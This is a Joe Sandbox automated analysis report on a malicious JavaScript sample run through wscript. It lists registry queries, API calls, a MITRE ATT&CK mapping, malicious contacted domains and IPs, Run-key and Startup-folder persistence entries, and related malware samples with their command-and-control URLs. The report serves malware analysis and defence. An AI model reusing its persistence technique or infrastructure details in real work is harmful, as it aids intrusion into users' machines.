Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe

Code function: 7_2_00007FF7C0BA3BF0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

7_2_00007FF7C0BA3BF0

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe

Code function: 7_2_00007FF7C0B96CEC RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,ReportEventW,DeregisterEventSource,SysFreeString,RegCloseKey,RegCloseKey,

7_2_00007FF7C0B96CEC

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe

Code function: 7_2_00007FF7C0BA0E04 RtlInitializeCriticalSection,GetVersionExA,

7_2_00007FF7C0BA0E04

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B991AC GetUserDefaultLCID,CreateBindCtx,	7_2_00007FF7C0B991AC
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B94FE0 CreateBindCtx,SysAllocStringByteLen,SysFreeString,	7_2_00007FF7C0B94FE0
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: 7_2_00007FF7C0B9C370 CreateBindCtx,MkParseDisplayName,	7_2_00007FF7C0B9C370

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Startup Items1	Startup Items1	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting13	Registry Run Keys / Startup Folder21	Process Injection112	Virtualization/Sandbox Evasion12	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Data Encoding1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Logon Script (Windows)	Registry Run Keys / Startup Folder21	Process Injection112	Security Account Manager	Security Software Discovery121	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting13	NTDS	Virtualization/Sandbox Evasion12	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Process Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	File and Directory Discovery2	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Information Discovery125	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
xPUqa4qbDL.js	36%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
101legit.com	6%	Virustotal	Browse
legitville.com	2%	Virustotal	Browse
ww7.101legit.com	6%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://101legit.com/	6%	Virustotal		Browse
http://101legit.com/	0%	Avira URL Cloud	safe
http://101legit.com/0.htmle843	0%	Avira URL Cloud	safe
http://101legit.com/0.html	7%	Virustotal		Browse
http://101legit.com/0.html	0%	Avira URL Cloud	safe
http://101legit.com/0.html1	0%	Avira URL Cloud	safe
https://assets.onestore.ms	0%	URL Reputation	safe
https://assets.onestore.ms	0%	URL Reputation	safe
https://assets.onestore.ms	0%	URL Reputation	safe
http://ww7.101legit.com/ll	0%	Avira URL Cloud	safe
https://products.office~	0%	Avira URL Cloud	safe
http://legitville.com/0.htmlll	0%	Avira URL Cloud	safe
https://mem.gfx.ms	0%	URL Reputation	safe
https://mem.gfx.ms	0%	URL Reputation	safe
https://mem.gfx.ms	0%	URL Reputation	safe
http://ww7.101legit.com/	0%	Avira URL Cloud	safe
https://mem.gfx.ms/meversion?partner=MSHomePage&market=de-ch&uhf=1	0%	URL Reputation	safe
https://mem.gfx.ms/meversion?partner=MSHomePage&market=de-ch&uhf=1	0%	URL Reputation	safe
https://mem.gfx.ms/meversion?partner=MSHomePage&market=de-ch&uhf=1	0%	URL Reputation	safe
http://legitville.com/0.html	0%	Avira URL Cloud	safe
https://azure.micro	0%	Avira URL Cloud	safe
http://ww7.101legit.com	0%	Avira URL Cloud	safe
http://legitville.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
76899.bodis.com	199.59.242.153	true	false		high
101legit.com	72.52.178.23	true	true	6%, Virustotal, Browse	unknown
legitville.com	204.11.56.48	true	true	2%, Virustotal, Browse	unknown
ww7.101legit.com	unknown	unknown	true	6%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101legit.com/0.html	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ww7.101legit.com/	true	Avira URL Cloud: safe	unknown
http://legitville.com/0.html	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://outlook.live.com/owa/	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
http://101legit.com/	wscript.exe, 00000000.00000003.186393509.000001F4683A2000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.186418382.000001F46837E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189410935.000002156F153000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189436287.000002156F172000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.456011040.000001F7A3FBC000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000003.196507204.000001F7A3F93000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000003.197704132.000001D32E6D3000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457059419.000001D32E6FC000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221994651.000001F1F824C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221297281.000001F1F8223000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236818352.0000025BBDB9C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236186995.0000025BBDB73000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254530291.000001DBCE562000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254624235.000001DBCE543000.00000004.00000001.sdmp	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.onenote.com/?omkt=de-CH	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
http://101legit.com/0.htmle843	wscript.exe, 00000002.00000003.202889828.000002156F338000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://microsoftwindows.112.2o7.net	wscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202797295.000002156F850000.00000004.00000001.sdmp	false		high
https://onedrive.live.com/about/de-ch/	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
http://requirejs.org/docs/errors.html#	wscript.exe, 00000002.00000003.210219910.000002156F351000.00000004.00000001.sdmp	false		high
http://github.com/requirejs/requirejs/LICENSE	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
https://swiftkey.com/images/misc/stores/app/en.png	wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmp	false		high
http://101legit.com/0.html1	wscript.exe, 00000002.00000002.459496028.000002156F700000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://products.office.com/de-ch/academic/compare-office-365-education-plans	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
https://assets.onestore.ms	wscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.skype.com/de/	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
http://ww7.101legit.com/ll	wscript.exe, 00000002.00000003.210589425.000002156F82B000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://www.youtube.com/user/MicrosoftCH	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
https://products.office~	wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://legitville.com/0.htmlll	wscript.exe, 00000002.00000003.339266046.000002156F320000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://mem.gfx.ms	wscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.210173138.000002156F279000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://publisher.liveperson.net/iframe-le-tag/iframe.html?lpsite=60270350&lpsection=store-sales	wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmp	false		high
https://mem.gfx.ms/meversion?partner=MSHomePage&market=de-ch&uhf=1	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://github.com/requirejs/domReady	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
https://schema.org/ItemList	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
https://twitter.com/microsoft_ch	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
https://azure.micro	wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/microsoftch/	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
https://www.linkedin.com/company/1035	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
https://www.xbox.com/	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
http://github.com/aFarkas/lazysizes	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
https://publisher.liveperson.net	wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmp	false		high
http://schema.org/Organization	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
http://ww7.101legit.com	wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://channel9.msdn.com/	wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmp	false		high
http://legitville.com/	wscript.exe, 00000000.00000003.186393509.000001F4683A2000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.186418382.000001F46837E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189410935.000002156F153000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189436287.000002156F172000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.456011040.000001F7A3FBC000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000003.196507204.000001F7A3F93000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000003.197704132.000001D32E6D3000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457059419.000001D32E6FC000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221994651.000001F1F824C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221297281.000001F1F8223000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236818352.0000025BBDB9C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236186995.0000025BBDB73000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254530291.000001DBCE562000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254624235.000001DBCE543000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
72.52.178.23	101legit.com	United States	32244	LIQUIDWEBUS	true
199.59.242.153	76899.bodis.com	United States	395082	BODIS-NJUS	false
204.11.56.48	legitville.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	365904
Start date:	10.03.2021
Start time:	07:00:50
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	xPUqa4qbDL (renamed file extension from none to js)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.evad.winJS@13/12@3/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 36.2%) Quality average: 25.8% Quality standard deviation: 38.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.210.154, 40.88.32.150, 92.122.145.220, 92.122.145.53, 168.61.161.212, 51.104.139.180, 184.30.24.56, 93.184.221.240, 20.54.26.129, 92.122.213.247, 92.122.213.194, 52.147.198.201, 104.43.193.48 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, e13678.dscb.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, www.microsoft.com-c-3.edgekey.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, www.microsoft.com Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:01:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run uobmovqn "C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe" "C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js"
07:01:41	API Interceptor	2x Sleep call for process: wscript.exe modified
07:01:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run uobmovqn "C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe" "C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js"
07:01:52	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ttdwagotd.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
72.52.178.23	81msxxUisn.exe	Get hash	malicious	Browse	www.nogrudge.com/ndm/?ndkdxd=UXX0bLfxYLyH&mHLDZX=H2A+iUcBXA4pvzlpLnHoTtAhYe/AosYsS6mssCYUdSkJoc9KzWoLI56ChKKWBKP76/3sWxYIhQ==
	Q38V8rfI5H.js	Get hash	malicious	Browse	101legit.com/0.html
	Q38V8rfI5H.js	Get hash	malicious	Browse	101legit.com/0.html
	7IEK8G8P67.js	Get hash	malicious	Browse	101legit.com/0.html
	7IEK8G8P67.js	Get hash	malicious	Browse	101legit.com/0.html
	PI 11172020.xlsx	Get hash	malicious	Browse	www.paragonic.com/egem/?Ob20Lf_=+SOZmDNuyMcuxJO1TLnPFsdIsmdtl1qFj/QFY12FkiWknvVrPNzDCdooHZfrGkV6uT0+EQ==&BB6=L48xY
	SKMBT 25032020 Ref- 0000019.exe	Get hash	malicious	Browse	www.aalldxea.com/pg/
	4535B9F39E debt payment invoice #U007epdf.js	Get hash	malicious	Browse	canonsupervideo4k.ws/3yiqvg7v
	4535B9F39E debt payment invoice #U007epdf.js	Get hash	malicious	Browse	canonsupervideo4k.ws/3yiqvg7v
199.59.242.153	PO #6093245.exe	Get hash	malicious	Browse	www.columbiapatientsafety.com/b3pu/?kzrxUJ=Po+ooE/DTuM+SNsPvO9X33bQcBYkN9VVSpga1iLrEH685rCxHFclWjqsXp2fuCLu/+rZ&mBy=wZOTMdR8Z49L4
	1feiNnK6Qd.exe	Get hash	malicious	Browse	www.krishnagiri.info/nsag/?arX=hPHybZPTt185zNO3xz6D1Y5bPXZXETq0TTvyEiyuX6EjGbgQmrQNvgkWI3CJg50tk2Lo&9rdX=bJEPUthHNB
	bXSINeHUUZ.dll	Get hash	malicious	Browse	ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20210309-0527-3817-b78c-1499536b2816
	R8WWx5t2RE.dll	Get hash	malicious	Browse	ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20210309-0525-1690-a44f-893fe3fe808a
	KCCAfipQl2.dll	Get hash	malicious	Browse	ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20210309-0523-4094-953a-a3979b22da2d
	Confirmaci#U00f3n de pago.exe	Get hash	malicious	Browse	www.upmchealhtrak.com/uidr/?tFQt=EJZKOT9ZCEKBmohuC2k9yF0p2trzw4QyidNomzMnQ/ct05beZhyUzb0V3MCAx6o5O4uT&CTp0=ctxDHzZH
	twistercrypted.exe	Get hash	malicious	Browse	www.checkmategmaing.com/e3rp/?j8pPk=WoT9kU8rqi/cGZL03oGYdUMw0kSwjDQq+YneiDuMSKhXxULaCpep70maN8hHS2zUupty&iJ=yL3dpJexppT
	Order List - 022321-xlxs.exe	Get hash	malicious	Browse	www.atz.xyz/uqf5/?Y4pXFx5x=9R7mWhibPviiLk5eV4s6uz/T/8hHJufzZ1ieMJl7LRomqj4xOZDdgVablK5grD0qowC2V5GUvg==&BR-=UTjHnDN0Jp9hlD
	PO_210222.exe	Get hash	malicious	Browse	www.eledtrik.com/dka/?9rYD4D2P=eOs6xd3Ml1PMRUlbDAfSVpAT1Vk8+bdcXqll9ZJxBwkAhsvksTKjTIh/2VIoKnKzbzZo&4h=vTxdADNprBU8ur
	DHL Document. PDF.exe	Get hash	malicious	Browse	www.planethomrlending.com/d8ak/?Szr0s4=muDBtN5C7gxarYEMHW0HQdb5sxbxLt5mXwS4NwCRlsIowigLClLzNrWqRxy8FKdZHTfe3rxTxw==&QL3=uTyTqJdh5XE07
	Payment advice.xls	Get hash	malicious	Browse	ww25.findresults.site/?rpid=5PO84Q269&subid1=20210216-1943-0088-a8ce-7e3bf2dc56d1
	8nxKYwJna8.exe	Get hash	malicious	Browse	www.traptlongview.com/csv8/?UT=EhUhb4&OjKL3=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslVjOxon4Fjc0
	gRd8HGFpL7.exe	Get hash	malicious	Browse	www.fallguysmovile.com/kgw/?8pBp5p=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs85UuSrS+8ZI+ZgfU1g==&LXPL=yvqlQXkhnxmxPrbP
	DHL eShipment invoice_pdf.exe	Get hash	malicious	Browse	www.401ktrsretire.com/u2km/?Mvmx=B0k1Yb4MawxPLjWyGktSQMDpcKkODwmirhnhWS+Vo9XV9ofHvPKBx5I+TCgZKXjvwWTr&_PXh=xxlLi
	bAcefnEUjb.exe	Get hash	malicious	Browse	www.bigdudedesign.com/xle/?mdsh-n6=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7tc0TzIhsDi0JEkXg==&lZN=7neHzjSxG
	Xi4vVgHekF.exe	Get hash	malicious	Browse	www.tamilfgun.com/rina/?GFQL=e/BgiNa0Nzl6UsiYB5UQwDPPSQ8F3U8y9racLRUpmblz1Tud/bjp2j9Ybm0mnAyqoOqa&wFN0DX=UtX8E
	q2EKWldniJ.exe	Get hash	malicious	Browse	www.traptlongview.com/csv8/?0bGHQH3=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslWP0ypLDGU9liE66TA==&OVlhnL=o2J8lZBpAfJxQ2MP
	Inv_9876567.doc	Get hash	malicious	Browse	www.beeriderrebates.com/rcm/?AN=F1HB7K90F0MHqluK4kkhjYJfrVu8LZyU6DVhmM+rm+KrWrRFJs8bddwSly3mZm2SV1SoOQ==&v0D8fJ=ZvMhsfAX
	4NoiNHCNoU.exe	Get hash	malicious	Browse	www.artdonline.com/wdva/?CTvp=fvUh_lYhi2Qtqn&YP7HsZXp=xHc9ODtVxj0eUWmi3yu1PHJO+9FS2s4H+8Xc5Nf8URN5DAD0y+vEo6QceVJID6bTGhq7
	mtsWWNDaNF.exe	Get hash	malicious	Browse	www.traptlongview.com/csv8/?9r=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslVjOxon4Fjc0&w2=jFQp32IXi

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
76899.bodis.com	7IEK8G8P67.js	Get hash	malicious	Browse	199.59.242.153
101legit.com	7IEK8G8P67.js	Get hash	malicious	Browse	72.52.178.23
	emwkvlhvf.js	Get hash	malicious	Browse	127.0.0.1
	emwkvlhvf.js	Get hash	malicious	Browse	127.0.0.1
	vrswuyr.js	Get hash	malicious	Browse	127.0.0.1
	vrswuyr.js	Get hash	malicious	Browse	127.0.0.1
	test.js	Get hash	malicious	Browse	198.54.117.244
	test.js	Get hash	malicious	Browse	198.54.117.244
	qrlyyqnmy.js	Get hash	malicious	Browse	198.54.117.244
	diboj.js	Get hash	malicious	Browse	127.0.0.1
	diboj.js	Get hash	malicious	Browse	127.0.0.1
	ajwngsj.js	Get hash	malicious	Browse	127.0.0.1
	ajwngsj.js	Get hash	malicious	Browse	127.0.0.1
	nbmvwchp.js	Get hash	malicious	Browse	198.54.117.244
legitville.com	Q38V8rfI5H.js	Get hash	malicious	Browse	204.11.56.48
	Q38V8rfI5H.js	Get hash	malicious	Browse	204.11.56.48
	7IEK8G8P67.js	Get hash	malicious	Browse	204.11.56.48
	7IEK8G8P67.js	Get hash	malicious	Browse	204.11.56.48
	emwkvlhvf.js	Get hash	malicious	Browse	104.27.154.55
	emwkvlhvf.js	Get hash	malicious	Browse	104.27.155.55
	vrswuyr.js	Get hash	malicious	Browse	104.27.155.55
	vrswuyr.js	Get hash	malicious	Browse	104.27.154.55
	test.js	Get hash	malicious	Browse	104.27.154.55
	test.js	Get hash	malicious	Browse	104.27.154.55
	qrlyyqnmy.js	Get hash	malicious	Browse	104.27.155.55
	qrlyyqnmy.js	Get hash	malicious	Browse	104.27.155.55
	biqodvu.js	Get hash	malicious	Browse	104.18.40.101
	biqodvu.js	Get hash	malicious	Browse	104.18.40.101
	diboj.js	Get hash	malicious	Browse	104.27.155.55
	diboj.js	Get hash	malicious	Browse	104.27.155.55
	ajwngsj.js	Get hash	malicious	Browse	104.27.154.55
	ajwngsj.js	Get hash	malicious	Browse	104.27.154.55
	nbmvwchp.js	Get hash	malicious	Browse	104.27.154.55
	nbmvwchp.js	Get hash	malicious	Browse	104.27.155.55

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CONFLUENCE-NETWORK-INCVG	CHANG 290386.exe	Get hash	malicious	Browse	209.99.40.222
	PO #6093245.exe	Get hash	malicious	Browse	204.11.56.48
	orii11.exe	Get hash	malicious	Browse	209.99.40.222
	orii11.exe	Get hash	malicious	Browse	208.91.197.91
	bnb.exe	Get hash	malicious	Browse	208.91.197.91
	nova proforma.exe	Get hash	malicious	Browse	209.99.64.33
	Grupo Dani New Inquiry Order.exe	Get hash	malicious	Browse	208.91.197.91
	yCWzTRmMP4.exe	Get hash	malicious	Browse	209.99.40.222
	SWIFT Ref F607163435808987.xlsx	Get hash	malicious	Browse	208.91.197.27
	P87k5f5ecn.exe	Get hash	malicious	Browse	208.91.197.27
	Receipt.xlsx	Get hash	malicious	Browse	208.91.197.27
	FileZilla_3.50.0_win32-setup.exe	Get hash	malicious	Browse	204.11.56.48
